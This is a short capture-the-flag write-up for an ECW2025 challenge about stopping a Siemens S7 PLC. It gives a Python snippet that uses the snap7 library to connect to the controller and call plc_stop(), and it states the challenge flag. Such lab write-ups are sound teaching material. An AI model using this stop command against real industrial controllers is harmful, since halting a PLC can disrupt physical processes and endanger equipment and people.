Ax8457/WriteUPs/ECW2025/S7_PLC/README.md

 ## Stop This PLC

+<p aling="justify">In this challenge the idea was to stop the PLC.
+To do so snap7 libraries provides plc_stop() method:</p>

 ````python3
 import snap7
 client = snap7.client.Client()
 client.connect(PLC_IP, PLC_RACK, PLC_SLOT, PLC_PORT)
 client.plc_stop()
 ````
+<p aling="justify">After the PLC was successfuly stopped, we must look at network traffic to see the packet containing the flag being sent :</p>
 <p align="center"><img src="./Screenshots/flagPLCs72.png"></p>

 FLAG : _ECW{S7-315-stop}_ , Thanks _DGA_ for this challenge !